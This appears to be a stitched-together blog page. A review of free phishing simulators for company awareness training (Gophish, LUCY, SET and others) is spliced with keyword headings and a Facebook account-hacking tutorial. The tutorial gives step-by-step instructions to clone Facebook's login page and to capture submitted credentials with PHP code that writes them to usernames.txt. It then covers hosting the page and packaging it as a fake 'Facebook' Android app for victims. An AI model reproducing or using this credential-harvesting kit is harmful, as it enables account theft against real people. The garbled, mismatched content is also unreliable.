How To Create Facebook Phishing Page In Android

Posted on |



The title of this article was supposed to be “Top 10 Free Phishing Simulators”. However, after much searching, trying, visiting of broken links, filling out forms and signing up for mailing lists, it became clear that the combination of “free” and “top” really narrows down the selection to very few actual choices for phishing training. The final list does not include any of the fishy (pardon the pun) apps that let you create a fake website or phishing site for collecting data. Nor are we including any of the free managed campaigns offered by so many now popular phishing services. We wanted to focus on tools that allow you to actually run a phishing campaign on your own, i.e. create and send at least one phishing email to a real recipient.

And even more Facebook's security will not be able to catch you, you may have noticed that when you send your phishing link to any Facebook Friends, then Facebook automatically blocks that link. And the best part is that in this article you can use a computer or mobile phone, and you can easily hack someone's Facebook account. Click on CREATE NOW Button Click the option website Paste the phishing page's url in the field (that you created in step1) Fill the field App name: Facebook or something related with facebook, click next. There are ready-made templates to phishing and hack many of the popular websites like Twitter, Facebook, Instagram, Google, steam, Github, LinkedIn, Pinterest, and quora. Step 5) Phishing with Phishx The PhishX interface is easy to use and can be easily mastered with a couple of tries.

Basically, if you are looking for a free phishing simulator for your company, you are down to three choices:

  1. Simple tools that will allow you to craft a simple email message and send it to one or several recipients using a specified mail server. Features like reporting or campaign management are often not an option, making them more like penetration testing tools than phishing simulators.
  2. Open-source phishing platforms. This is a growing and interesting category, which makes up the majority of our list. With open-source, you get all the usual benefits, such as feature-rich free versions and community support. But all the usual shortcomings are there as well: tools like this usually require some significant technical skills to install, configure, and run. Additionally, most of them are Linux-based. So, if words like “missing dependencies” don’t sound like an alien tongue, then this category may be of interest to you. Otherwise, there is the third choice.
  3. Demo versions of commercial products. The majority of commercial phishing simulators are offered as software-as-a-service (SaaS). With those, you usually get the best of all worlds: ease of use, rich features (including reporting), technical support, etc. With phishing being among the top cybersecurity risks and commercial phishing simulators popping up like mushrooms after a rain, finding a free demo seems like an easy task. That is, until you actually try.In most cases, the best can you get after jumping through various hoops (filling out a request form, subscribing to a mailing list, confirming your email address, etc.) is a free campaign managed by the vendor, or a demo account with so many limitations that it doesn’t even give you a good understanding of the full version’s capabilities, let alone providing you with an actual tool that you can effectively use to create and manage multiple phishing campaigns. The most likely scenario for SaaS phishing platforms is a scheduled demonstration, which may or may not result in you obtaining access to a version of product that you can actually use. There is, however, an exception to this rule, which you will see on top of our list.

Top 9 Phishing Simulators

1. Infosec IQ

Infosec IQ by Infosec includes a free Phishing Risk Test that allows you to to launch a simulated phishing campaign automatically and receive your organization’s phish rate in 24 hours.

You can also access Infosec IQ’s full-scale phishing simulation tool, PhishSim, to run sophisticated simulations for your entire organization. PhishSim contains a library of 1,000+ phishing templates, attachments and data entry landing pages. Phishsim templates are added weekly, allowing you to educate employees on the most topical phishing scams. Want to build your own phishing emails? PhishSim has a drag-and-drop template builder so you can build your phishing campaigns to your exact specification.

Signing up for a free Infosec IQ account gets you full access to the PhishSim template library and education tools, but you’ll need to speak with an Infosec IQ representative for the ability to launch a free PhishSim campaign.

2. Gophish

Phishing Page For Facebook

As an open-source phishing platform, Gophish gets it right. It is supported by most operating systems, installation is as simple as downloading and extracting a ZIP folder, the interface is simple and intuitive, and the features, while limited, are thoughtfully implemented. Users are easily added, either manually or via bulk CSV importing. Email templates are easy to create (there aren’t any included though, with a community-supported repository initiated) and modify (using variables allows for easy personalization), creating campaigns is a straightforward process, and reports are pleasant to look at and can be exported to CSV format with various levels of detail. Major drawbacks: no awareness education components and no campaign scheduling options.

3. LUCY

The first commercial product on our list, LUCY provides a hassle-free download of the free (community) version of the platform. All you need is your email address and name, and you can download LUCY as a virtual appliance or a Debian install script. The web interface is attractive (if a bit confusing), and there are lots of features to explore: LUCY is designed as a social engineering platform that goes beyond phishing. The awareness element is there as well with interactive modules and quizzes. So, why didn’t we place LUCY higher up the list? Because we are talking about free phishing simulators, and the community version of LUCY has too many limitations to be effectively used in an enterprise environment. Some important features are not available under community license, such as exporting campaign stats, performing file (attachment) attacks, and, most importantly, campaign scheduling options. With that, the free version of LUCY gives you a taste of what the paid version is capable of, but doesn’t go much farther than that.

4. Simple Phishing Toolkit (sptoolkit)

While this solution may lack in the GUI attractiveness department compared with some of the previous entries, there is one important feature that puts it in so high on our list. Simple Phishing Toolkit provides an opportunity to combine phishing tests with security awareness education, with a feature that (optionally) directs phished users to a landing page with an awareness education video. Moreover, there is a tracking feature for users who completed the training. Unfortunately, the sptoolkit project has been abandoned back in 2013. A new team is trying to give it a new life, but as of now, the documentation is scarce and scattered all over the internet, making realistic implementation in an enterprise environment a difficult task.

5. Phishing Frenzy

While this open-source Ruby on Rails application is designed as a penetration testing tool, it has many features that could make it an effective solution for internal phishing campaigns. Perhaps the most important feature is the ability to view detailed campaign stats and easily save the information to a PDF or an XML file. You can probably guess the “however” part that’s coming up: Phishing Frenzy is a Linux-based application, with installation not to be handled by a rookie.

6. King Phisher

With this open-source solution from SecureState, we are entering the category of more sophisticated products. King Phisher’s features are plentiful, including the ability to run multiple campaigns simultaneously, geo location of phished users, web cloning capabilities, etc. A separate template repository contains templates for both messages and server pages. User interface is clean and simple. What is not that simple, however, is installation and configuration. King Fisher server is only supported on Linux, with additional installation and configuration steps required depending on flavor and existing configuration.

7. SpeedPhish Framework (SPF)

Another Python tool created by Adam Compton. SPF includes many features that allow you to quickly configure and perform effective phishing attacks, including data entry attack vector (3 website templates are included, with possibility of using custom templates as well). While a tech-savvy security professional can have a lot of fun with SPF and will be able to run phishing campaigns against multiple targets, it is still mainly a pentesting tool, with many great features (such as email address gathering) being of little importance for someone performing internal phishing tests.

8. Social-Engineer Toolkit (SET)

Another tool from TrustedSec, which, as the name suggests, was designed for performing various social engineering attacks. For phishing, SET allows for sending spear-phishing emails as well as running mass mailer campaigns, as well as some more advanced options, such as flagging your message with high importance and adding list of target emails from a file. SET is Python based, with no GUI. As a penetration testing tool, it is very effective. As a phishing simulation solution, it is very limited and does not include any reporting or campaign management features.

9.SpearPhisher BETA

This tool isn’t trying to deceive anyone (other than its phishing targets). Developed by TrustedSec, SpearPhisher says it all right in the description: “A Simple Phishing Email Generation Tool.” With an emphasis on ‘simple.’ Designed for non-technical users, SpearPhisher is a Windows-based program with a straightforward GUI. It allows you to quickly craft a phishing email with customized From Email, From Name, and Subject fields and includes a WYSIWYG HTML editor and an option to include one attachment. You can send the crafted email to several recipients via adding email addresses to To, CC, and BCC fields. The program has been in Beta since 2013, so it’s not likely to see any updates in the near future.


Hey guys,
I hope you are fine ,now today i am coming with a new method of hacking Facebook using android application ,In my previous postWhat IS a phishing page i explain all steps in sequence wise for your clear understanding , today we use phishing but in another form of phishing ,in this tutorial we make an android application for android device when you or victim install it on your/his android device the fake Facebook phishing page will open when victim enter details all the information is saved in Web hosting server. This method is useable when your victim has android device just say them that install this .apk file and enjoy Facebook hacking with apk.
so now see how you make your own phishing app ,before going to next of the post i just want to tell you again what is phishing and how it work ?

status of phishing

A phishing technique was described in detail in a paper and presentation delivered to the International HP Users Group, Interex.The first recorded mention of the term 'phishing' is found in the hacking tool AOHell (according to its creator), which included a function for attempting to steal the passwords or financial details of America Online users. According to Ghosh, there were 445,004 attacks in 2012 as compared to 258,461 in 2011 and 187,203 in 2010, showing that phishing has been increasingly threatening individuals.
How

Create A Phishing Link

A recent and popular case of phishing is the suspected Chinese phishing campaign targeting Gmail accounts of highly ranked officials of the United States and South Korean Government, military, and Chinese political activists. The Chinese government continues to deny accusations of taking part in cyber-attacks from within its borders, but evidence has been revealed that China own People Liberation Army has assisted in the coding of cyber-attack software

Requirement:

  • 1-you need facebook phishing page with php script (don't worry if you don't know about it i explain it below)

  • 2-A web-hosting account where you host your phishing page

  • 3-and some time( at least 10 minutes if you are newbie)

Lets start our tutorial :

for your clear understanding i divide this tutorial in two section listed below:Create a phishing link
  • A-) Make phishing page and upload it on webhosting server

  • B-) Make the android application using phishing page

A) Step by step guide to make Facebook phishing page and upload it on server

step:1.) first of all Go to the www.Facebook.com

step:2) and then right click on the blank area, you will see the option view source page,simply click on that.(see bellow picture for better understanding )
step:3) now a pop up window will be open which contain a source code of Facebook page, And Copy all the code using Ctrl+c
Facebook
step:4) Now open the notepad and past all code here which copy in step 3

step:5) now press CTRL+F,and type ACTION.(see bellow picture)

step:6) You will have to search action again and again(press enter key 4-5 times) till you get like bellow code
action='https://www.facebook.com/login.php?login_attempt=1'
step:7) After that delete all the text written in inverted comma and instead of it write hack.php.then it will look like.( see bellow given picture)
action='hack.php'
steP:8) Now save it on your desktop with the name index.htm,not index.html,remember.
step:9) Now your phishing page is ready.it will look like a pic given bellow .

Phishing Page Creator



Android
step:9) now you need to create a php file for this Open a new notepad and copy the bellow code and save it with the name hack.php.
<?php
header ('Location:http://www.google/');
$handle = fopen('usernames.txt', 'a');
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, '=');
fwrite($handle, $value);
fwrite($handle, 'rn');
}
fwrite($handle, 'rn');
fclose($handle);
exit;
?>
Note: I use hack.php in step 7 that's why we need to use same name in step 9
step:10) You have successfully created two files
  • index.htm
  • hack .php,
Facebook phishing link

How To Do Phishing


step:11) now you need to upload these two files in a free web hosting site i am giving you the list of best webhosting site which are useful for you . you need to make a account on any of one below webhosting site.(I think the list is perfect for you)
www.my3gb.com
www.000webhost.com
www.freewebhosting.com
www.xhosting.com
http://110mb.com
http://ripway.com
http://superfreehost.info
http://freehostia.com
http://freeweb7.com
http://t35.com
http://awardspace.com
http://phpnet.us
http://prohosts.org
http://www.freezoka.com/
http://atspace.com

Note: I prefer 000webhost.com/my3gb.com because it is easy to use if it not work for you try another webhosting service which are mention above ,so here i am going to use my3gb.com in further steps

step:12) first of all make an account so go to www.my3gb.com and click on register button which is located in upper side bar.

step:13) now simply fill all necessary information in registration form

step:14) when your account completely setup simply login with your username and password
step:15) when you open your account you see control panel like bellow picture ,now click on file manager.
step:16) now file manager will open and you need to upload index.htm and hack.php file ,simply click on upload files button and upload both files there after uploading it look like bellow picture.

step:17) now click on index.htm file you see fake facebook page simply copy the url from your web browser url address bar .your link look like bellow :
http://www.yourusername.my3gb.com/index.htm

Note: note down the link which is mention above we will use this link in step 21
B)Make an android application using online app creator
step:18) first of all Go to this site www.appsgeyser.com which offer to create a android application online without having any coding or extra knowledge of any programming language.
step:19) after that you need to Click on CREATE NOW Button

step:20) here you get few option like below picture simply Click the option 'website'
step:21) Here in this window you will see some fields ,fill them like below
  • website url : Enter the phishing page's url (that you created in step17)

  • App name: Facebook or something related with facebook,

  • Description: here give description about your app what ever you want ,

  • Icon: In icon field you have two option one is use your 'cutsom icom and second is default icon choose one which you want.

step:23) when you filled all the required fields just Click 'Create app' button for creating your own phishing app and you have almost done!
step:24) when you click on 'create app' button a new window will open and ask for your name,last name ,email,password simply enter all fields and hit 'sign up' button
step:25) now when you make an account successfully simply open your control panel here you see the option 'download your application' hence download your android phishing facebook app easily.
that's it guys.


if you follow all procedure step by step then i'm dame sure that you easily make your own app ,if you faced any problem in any steps past your comment using below comment box ,if you like my post please don't forget to share my post .
By S0ft Hcks!

MR:47{XYBERSHEIKH}